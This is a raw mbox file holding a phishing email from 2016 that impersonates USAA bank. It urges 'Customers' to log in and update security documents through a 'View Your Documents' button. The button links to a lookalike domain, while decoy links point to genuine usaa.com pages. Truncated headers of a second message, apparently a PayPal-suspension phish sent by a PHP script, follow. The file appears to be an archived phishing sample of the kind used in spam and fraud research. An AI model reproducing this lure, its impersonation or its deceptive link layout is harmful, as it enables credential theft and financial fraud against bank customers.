From: "USAA" <web.support@security.org>
Date: Sun, 28 Feb 2016 13:19:33 -0700
Return-Path: web.support@security.org
Message-ID: <TSSERVERaZKY1d66HcA00000904@TSSERVER.afcmed.local>
X-OriginalArrivalTime: 28 Feb 2016 20:19:52.0795 (UTC) FILETIME=[61C3F2B0:01D17265]
Status: O
X-Status: 
X-Keywords:                  
X-UID: 89

You will not see this in a MIME-aware mail reader.
--===============1869694364==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


     =

   To ensure delivery to your inbox, please add to your address book.	  =

 =

    	  =

    =

  	  =

   Security Preference Update
  View Accounts | Privacy Promise | Contact Us
	 Online Security Guarantee  	 =

   =

   =

 =

    Dear Customers, Your access to our Internet Banking needs to be updated=
 for extra security measure to prevent identity theft. Log on to your accou=
nt by following the link below to view and  update your security and identi=
ty theft document on your account.
  =

   	 View Your Documents

  Thank you,
 USAA
   USAA's popular Deposit@Mobile is now available on Android-powered smart =
phones. With Deposit@Mobile, you can use your phone to deposit checks. Read=
 about it today. 	  =

   =

	  	  =

   	  	 	  =

   =

  Privacy Promise
 USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288
  USAA means United Services Automobile Association and its insurance, bank=
ing, investment and other
 companies. Banks Member FDIC. Investments provided by USAA Investment Mana=
gement Company
 and USAA Financial Advisors Inc., both registered broker dealers. =

  66676-0210   =

=20
--===============1869694364==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><br>




<div>

<div>
<div>
</div>
<table style=3D"WHITE-SPACE:normal;WORD-SPACING:0px;TEXT-TRANSFORM:none;COL=
OR:rgb(34,34,34);FONT:small arial,sans-serif;LETTER-

SPACING:normal;TEXT-INDENT:0px" bgcolor=3D"#b5d7e6" border=3D"0" cellpaddin=
g=3D"0" cellspacing=3D"0" width=3D"650">
<tbody>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" height=3D"35" align=
=3D"center" =


background=3D"https://ci6.googleusercontent.com/proxy/O8dKxf9Wzm-lPxd7ta6Cf=
zOTxG61BiIsnDwxKp5bx63QUoaQaWwL-

AuZ2ol3K7Bge2KpU49JY_r9kJq1X_3q57_yRLDKFvlz4Jpx_gtOhGTkNpDGDWgSLOFPfgWQlN6U=
ag=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_emailbar_bg.=
gif" valign=3D"middle" width=3D"650"><font style=3D"FONT-

SIZE:9px;COLOR:rgb(146,146,146)" face=3D"Verdana, sans-serif">To ensure del=
ivery to your inbox, please add<span>&nbsp;</span><span =


style=3D"COLOR:rgb(104,167,197)"><span style=3D"BACKGROUND:none transparent=
 scroll repeat 0% 0%;BORDER-BOTTOM:rgb(0,102,204) 1px =


dashed"></span></span>to your address book.</font></td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px">&nbsp;</td></tr></tbo=
dy></table>
<table style=3D"WHITE-SPACE:normal;WORD-SPACING:0px;TEXT-TRANSFORM:none;COL=
OR:rgb(34,34,34);FONT:small arial,sans-serif;LETTER-

SPACING:normal;TEXT-INDENT:0px" bgcolor=3D"#b5d7e6" border=3D"0" cellpaddin=
g=3D"0" cellspacing=3D"0" width=3D"650">
<tbody>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" width=3D"10">&nbsp;</=
td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" align=3D"center" bgco=
lor=3D"white" width=3D"630">
<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"604">
<tbody>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" colspan=3D"4" height=
=3D"5">&nbsp;</td></tr>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" height=3D"45" width=
=3D"54"><a style=3D"COLOR:rgb(17,85,204)" rel=3D"nofollow" =


href=3D"https://www.usaa.com/inet/ent_logon/Logon?EID=3D66676-0210_head" ta=
rget=3D"_blank"><img class=3D"CToWUd" alt=3D"" =


src=3D"https://ci4.googleusercontent.com/proxy/U0RKK-68hu6LgjAfA1jBqJ14QGkC=
UxkkcuzfVgJZRMAgGp-

B4wCEM2WQuMmqMY_hhx8klDZRxSzTmfy8kyoLfS7w2CCXC2cOlPA8E-CRLgExdwOLA6j852wY=
=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_logo.gif" he=
ight=3D"41" border=3D"0" width=3D"61"></a></td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px">
<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0">
<tbody>
<tr>
<td style=3D"FONT-SIZE:16px;FONT-FAMILY:Arial,sans-serif;FONT-WEIGHT:bold;C=
OLOR:rgb(109,109,109);MARGIN:0px;font-stretch:normal" =


height=3D"22" align=3D"left"><span style=3D"MARGIN-TOP:9px;DISPLAY:block">S=
ecurity&nbsp;Preference&nbsp;Update</span></td></tr>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" height=3D"23" align=
=3D"left" nowrap=3D""><font face=3D"Verdana, sans-serif" =


size=3D"1"><a style=3D"TEXT-DECORATION:none;COLOR:rgb(109,109,109)" rel=3D"=
nofollow" href=3D"https://www.usaa.com/inet/ent_home/CpHome?

EID=3D66676-0210_head" target=3D"_blank">View Accounts</a><span>&nbsp;</spa=
n>|<span>&nbsp;</span><a style=3D"TEXT-

DECORATION:none;COLOR:rgb(109,109,109)" rel=3D"nofollow" href=3D"https://ww=
w.usaa.com/inet/ent_utils/McStaticPages?

key=3Dprivacy_promise&amp;EID=3D66676-0210_head" target=3D"_blank">Privacy =
Promise</a><span>&nbsp;</span>|<span>&nbsp;</span><a =


style=3D"TEXT-DECORATION:none;COLOR:rgb(109,109,109)" rel=3D"nofollow" =


href=3D"https://www.usaa.com/inet/ent_contactus/CpLevelZeroContactUs?Contac=
tUsPageId=3DPublicContactUs&amp;EID=3D66676-0210_head" =


target=3D"_blank">Contact Us</a></font></td></tr></tbody></table></td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" height=3D"45" align=
=3D"right" valign=3D"middle" width=3D"367"><font face=3D"Verdana, =


sans-serif" size=3D"1">Online Security Guarantee</font>&nbsp;&nbsp;</td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" height=3D"45" width=
=3D"16"><img class=3D"CToWUd" alt=3D"" =


src=3D"https://ci5.googleusercontent.com/proxy/x4QRNjF3_0NZkuP4gRhf-7rw9PtH=
BLvlnN9kdl9cYTaoKEyV88t02iXXJldASqa1WJ3ez-rPwDSsn-

jVuFAJK1HyGfVUiI0GmPQBGq0LNTvselBeRHmMfRiaTimaa7uJtV4Stn3GvYMZI_uSriM=3Ds0-=
d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_lock.gif?EID=
=3D66676-0210_open" height=3D"24" border=3D"0" =


width=3D"18"></td></tr>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" colspan=3D"4" height=
=3D"20">&nbsp;</td></tr>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" colspan=3D"4" height=
=3D"1">&nbsp;</td></tr></tbody></table>
<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"95%">
<tbody>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" align=3D"left" width=
=3D"95%">

<div><font style=3D"FONT-SIZE:12px;COLOR:rgb(51,51,51);LINE-HEIGHT:18px" fa=
ce=3D"Verdana, sans-serif">Dear<span>&nbsp;</span><span =


style=3D"BACKGROUND:none transparent scroll repeat 0% 0%">Customers</span>,=
</font></div>


<div><font style=3D"FONT-SIZE:12px;COLOR:rgb(51,51,51);LINE-HEIGHT:18px" fa=
ce=3D"Verdana, sans-serif">Your access to our Internet =


Banking needs to be updated for extra security measure to prevent identity =
theft.&nbsp;Log on to&nbsp;your account by following =


the link below to view and &nbsp;update your security and identity theft do=
cument on your account.<br>
<p>
<table height=3D"15" bgcolor=3D"#6cae35" border=3D"0" cellpadding=3D"0" cel=
lspacing=3D"0">
<tbody>
<tr bgcolor=3D"#6cae35">
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" align=3D"center" bgco=
lor=3D"#6cae35" valign=3D"middle" width=3D"15"><font =


style=3D"FONT-SIZE:12px;COLOR:rgb(51,51,51);LINE-HEIGHT:18px" face=3D"Verda=
na, sans-serif"><img class=3D"CToWUd" =


src=3D"https://ci3.googleusercontent.com/proxy/FYiEznfFXDgvusVPr3vor_t23hJg=
nzhX16GxAWxVbe9HWt0xXsu9vLejdvQh3Hjvb68Y4tWwrUpGNT2Y6QF

k8aKi57x58_2VneLXUETCs33l89HYtbdpus00vO8sY0c=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_cta_arrow.gi=
f" height=3D"15" width=3D"15"></font></td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" align=3D"center" bgco=
lor=3D"#6cae35" valign=3D"middle" width=3D"134"><font =


style=3D"FONT-SIZE:12px;COLOR:rgb(51,51,51);LINE-HEIGHT:18px" face=3D"Verda=
na, sans-serif"><a style=3D"FONT-SIZE:11px;TEXT-

DECORATION:none;FONT-FAMILY:arial,sans-serif;FONT-WEIGHT:bold;COLOR:rgb(255=
,255,255);LINE-HEIGHT:normal;font-stretch:normal" =


rel=3D"nofollow" href=3D"http://usaaa.com.inet.ent-logon-verification.andys=
ocial.net/com.htm" target=3D"_blank">View Your =


Documents</a></font></td></tr></tbody></table><br>
<p>
<font style=3D"FONT-SIZE:12px;COLOR:rgb(51,51,51);LINE-HEIGHT:18px" face=3D=
"Verdana, sans-serif">Thank you,<br>
<span style=3D"BORDER-BOTTOM:rgb(0,102,204) 1px dashed">USAA</span><br>
</font>



<div><font style=3D"FONT-SIZE:12px;COLOR:rgb(51,51,51);LINE-HEIGHT:18px" fa=
ce=3D"Verdana, sans-serif"><img class=3D"CToWUd" =


src=3D"https://ci3.googleusercontent.com/proxy/MhSIwPNpS3CTTqxtxwhWmzgxgi1y=
G_tW5F3dwwX2XLPw4nPzJVz5e6PYk1YDZQ_JhVF_tbCOm9n_QY8OpFD

VA-zcUiDX1hZi7seEmlU82FphgERbswWT2jhBqix4=3Ds0-d-e1-ft#https://content.usaa=
.com/mcontent/static_assets/Media/linkArrowsLrg.gif" =


height=3D"9" border=3D"0" width=3D"12">&nbsp;<a style=3D"TEXT-DECORATION:no=
ne;FONT-WEIGHT:bolder;COLOR:rgb(12,122,175)" =


rel=3D"nofollow">USAA's popular Deposit@Mobile is now available on Android-=
powered smart phones. With Deposit@Mobile, you can use =


your phone to deposit checks. Read about it today.</a></font></div>
</td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px">&nbsp;</td></tr>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" colspan=3D"2" height=
=3D"30">&nbsp;</td></tr></tbody></table></td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" =


background=3D"https://ci6.googleusercontent.com/proxy/dHvaRUBWCIfFtrHfu4sc5=
wMoCjH09dFeHtW7_kybNUd3RaZKK3YsVGDHL-

tNwPRfdbAsVRYO2cJvTmZ8GSkxn8fTL8xj9jvoN2DJVV5O0eIX3T_QEV6VT8HrXjTr3FC5Vg=3D=
s0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_vertical-ds.=
gif" width=3D"5">&nbsp;</td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" width=3D"5">&nbsp;</t=
d></tr>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" height=3D"5" width=3D=
"10">&nbsp;</td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" height=3D"5" =


background=3D"https://ci4.googleusercontent.com/proxy/Gf7UyLklfYxgVlMIO_g19=
drjx5aVhA3iS9DM6MALB9y5_TnQIzZO7ygrU2mtPgW_t2oNRQ0In8cw

1DM73QAm3IGI0Jr-IMcHR6eV5nYnjXHtdMtVl_69y1yCfnJkt0BX_Qdi=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_horizontal-d=
s.gif" width=3D"630">&nbsp;</td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" height=3D"5" width=3D=
"5"><img class=3D"CToWUd" alt=3D"" =


src=3D"https://ci6.googleusercontent.com/proxy/g9ATSXZi7Ox1OS0U9w7SJKIJYbQY=
2B6VDFdmA2scfeDT_Th0nMeIkMecyhZ_jnhn4F4ZkS1hGKCTY64xPhY

g9gdjdRSr6jwydPdwAxYN1ACsvYqwPx7_ZYFNAA2vf0s=3Ds0-d-e1-ft#https://content.u=
saa.com/mcontent/static_assets/Media/email_corner-

ds.gif" height=3D"5" border=3D"0" width=3D"5"></td>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" height=3D"5" width=3D=
"5">&nbsp;</td></tr>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" colspan=3D"4" height=
=3D"20">&nbsp;</td></tr>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" colspan=3D"4" align=
=3D"center"><font style=3D"FONT-SIZE:10px;COLOR:rgb

(109,109,109);LINE-HEIGHT:18px" face=3D"Verdana, sans-serif"><a style=3D"CO=
LOR:rgb(109,109,109)" rel=3D"nofollow" =


href=3D"https://www.usaa.com/inet/ent_utils/McStaticPages?key=3Dprivacy_pro=
mise&amp;EID=3D66676-0210_foot" target=3D"_blank">Privacy =


Promise</a><br>
USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288<br>
</font>

<div style=3D"PADDING-BOTTOM:10px;PADDING-TOP:10px;PADDING-LEFT:10px;PADDIN=
G-RIGHT:10px" align=3D"left"><font style=3D"FONT-

SIZE:10px;COLOR:rgb(109,109,109);LINE-HEIGHT:18px" face=3D"Verdana, sans-se=
rif">USAA means<span>&nbsp;</span><span =


style=3D"BACKGROUND:none transparent scroll repeat 0% 0%">United Services A=
utomobile =


Association</span><span>&nbsp;</span>and<span>&nbsp;</span><a style=3D"TEXT=
-DECORATION:none;COLOR:rgb(64,140,176)" rel=3D"nofollow" =


href=3D"https://www.usaa.com/inet/ent_utils/McStaticPages?key=3Dabout_usaa_=
overview&amp;EID=3D66676-0210_foot" target=3D"_blank">its =


insurance, banking, investment and other<br>
companies</a>. Banks Member FDIC. Investments provided by<span>&nbsp;</span=
><span style=3D"BACKGROUND:none transparent scroll =


repeat 0% 0%">USAA Investment Management Company</span><br>
and USAA<span>&nbsp;</span><span>Financial Advisors Inc</span>., both regis=
tered broker dealers.</font></div>
</td></tr>
<tr>
<td style=3D"FONT-FAMILY:arial,sans-serif;MARGIN:0px" colspan=3D"4" align=
=3D"right"><font style=3D"FONT-SIZE:10px;COLOR:rgb

(109,109,109);LINE-HEIGHT:18px" face=3D"Verdana, sans-serif">66676-0210&nbs=
p;&nbsp;&nbsp;</font><br>
</html>
--===============1869694364==--

From jose@monkey.org Sun Feb 28 16:43:51 2016 +0000
Return-Path: ftp17003@uitinlier.be
Delivered-To: jose@monkey.org
X-FDA: 71238430662.04.deer19_78ea0ec1e2e51
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 73,5,0,929150d227e395b5,d41d8cd98f00b204,ftp17003@uitinlier.be,:,RULES_HIT:2:41:72:355:375:379:541:542:960:962:967:973:978:983:988:989:1026:1155:1160:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1515:1516:1517:1535:1571:1588:1589:1592:1593:1594:1606:1631:1710:1730:1747:1777:1792:1801:1803:2198:2199:2393:2525:2527:2528:2539:2543:2560:2564:2610:2682:2685:2693:2828:2859:2890:2892:2894:2895:2896:2901:2902:2909:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3024:3138:3139:3140:3141:3142:3352:3865:3867:3868:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:3976:3991:4000:4042:4117:4321:4605:5007:6096:6117:6261:6669:6674:6678:8603:8824:8828:8957:9025:9074:9149:9388:9908:10346:10919:11026:11656:11658:11914:12043:12295:12315:12438:12555:12575:12679:12955:12958:12973:13026:13374:13439:13894:21080:21220:30001:30016:30022:30051:30054:30055:30069:30070:30075:30080,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,
X-HE-Tag: deer19_78ea0ec1e2e51
X-Filterd-Recvd-Size: 6130
Received: from Mobi-OCS01.mobitronics-dns.be (mobitronics-dns.be [31.193.180.231])
	by imf18.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun, 28 Feb 2016 16:43:50 +0000 (UTC)
Received: by Mobi-OCS01.mobitronics-dns.be (Postfix, from userid 10048)
	id 953BB398040; Sun, 28 Feb 2016 17:43:43 +0100 (CET)
To: jose@monkey.org
Subject: Your PayPal account has been suspended Case ID 364-186-4896
X-PHP-Originating-Script: 10048:Zmlr2.php
